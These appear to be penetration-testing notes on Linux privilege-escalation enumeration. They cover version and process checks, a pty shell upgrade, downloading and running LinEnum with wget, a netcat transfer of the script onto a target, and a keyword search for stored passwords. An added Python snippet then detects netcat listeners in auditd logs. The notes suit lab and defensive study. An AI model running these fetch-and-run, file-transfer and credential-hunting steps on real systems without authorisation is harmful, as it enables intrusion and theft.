cat /etc/lsb-release **(might not be installed)**
cat /etc/os-release
cat /proc/version
cat /etc/issue **(the friendly version info)**
hostnamectl
diego-treitos/linux-smart-enumeration
sudo -l # If a result pops up, it's very likely to be the privesc
ip addr # Check if the box is dual homed
ps aux # Check for non-standard processes running as root, and any processes that didn't show during initial exploitation
ss -plant # Check for services listening internally, checks similar to ps aux
# Stabilised TTY shell
python -c 'import pty; pty.spawn("/bin/sh")'
export TERM=xterm
LinuxPrivChecker #Check for privilege escalation methods
Unix-privesc-check # Script for finding common misconfigurations which can help elevate our privileges on a Linux-based system
Automated information gathering tool
wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
If you’re unable to download LinEnum, you can use netcat to transfer it across by setting up a listener on the target to redirect incoming data to a new file while the attacker connects and redirects LinEnum.sh to the target:
Target machine:
nc -l -p 1234 > LinEnum.sh
Attacker machine:
nc -w 3 <target_IP> 1234 < LinEnum.sh
NOTE: when transferring files by netcat, all traffic is unencrypted and may be detected by Intrusion Detection Systems or other anomalous traffic detection mechanisms implemented within an organisation. It’s quick and easy to transfer files using netcat, but not stealthy.
chmod +x LinEnum.sh
./LinEnum.sh -h
Using the -k (keyword) option, we can have LinEnum search configuration files for a string such as “password”, which can reveal credentials.
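
The NOTE above says a netcat transfer may be detected. One host-side way to do that is to watch process-execution audit records for netcat started in listen mode. This is an added example, not part of the original notes: the auditd EXECVE records are constructed sample data, and the function names are hypothetical.

```python
import os
import re

# Constructed auditd EXECVE records (sample data, not from the original page).
SAMPLE_LOG = """\
type=EXECVE msg=audit(1712345678.101:901): argc=4 a0="nc" a1="-l" a2="-p" a3="1234"
type=EXECVE msg=audit(1712345680.303:903): argc=5 a0="/usr/bin/nc" a1="-w" a2="3" a3="10.0.0.5" a4="1234"
type=EXECVE msg=audit(1712345681.404:904): argc=3 a0="/bin/ncat" a1="-lvnp" a2="4444"
type=EXECVE msg=audit(1712345682.505:905): argc=3 a0="python" a1="-c" a2=696D706F72742070747920
"""

NETCAT_NAMES = {"nc", "ncat", "netcat", "nc.traditional", "nc.openbsd"}
EVENT_RE = re.compile(r"msg=audit\([\d.]+:(\d+)\)")
ARG_RE = re.compile(r'\ba(\d+)=(?:"([^"]*)"|([0-9A-Fa-f]+))')


def parse_execve(line):
    """Return (event_id, argv) for an EXECVE record, or None for other lines."""
    event = EVENT_RE.search(line)
    if not line.startswith("type=EXECVE") or not event:
        return None
    args = {}
    for idx, quoted, hexed in ARG_RE.findall(line):
        # auditd hex-encodes arguments that contain spaces or special characters.
        args[int(idx)] = bytes.fromhex(hexed).decode("utf-8", "replace") if hexed else quoted
    return int(event.group(1)), [args[i] for i in sorted(args)]


def listen_port(argv):
    """Port following a -p style flag, else the last purely numeric argument."""
    for flag, value in zip(argv[1:], argv[2:]):
        if flag.startswith("-") and flag.endswith("p") and value.isdigit():
            return int(value)
    numeric = [int(a) for a in argv[1:] if a.isdigit()]
    return numeric[-1] if numeric else None


def netcat_listeners(log_text):
    """Return (event_id, port, argv) for each netcat process started in listen mode."""
    hits = []
    for line in log_text.splitlines():
        parsed = parse_execve(line)
        if not parsed or not parsed[1] or os.path.basename(parsed[1][0]) not in NETCAT_NAMES:
            continue
        event_id, argv = parsed
        flags = [a for a in argv[1:] if a.startswith("-")]
        if any(a == "--listen" or (a[1:2] != "-" and "l" in a) for a in flags):
            hits.append((event_id, listen_port(argv), argv))
    return hits
```

The shell redirection (`> LinEnum.sh`) never appears in the EXECVE arguments, so the listener itself is the signal; pairing it with file-creation audit rules is what ties the process to the written file.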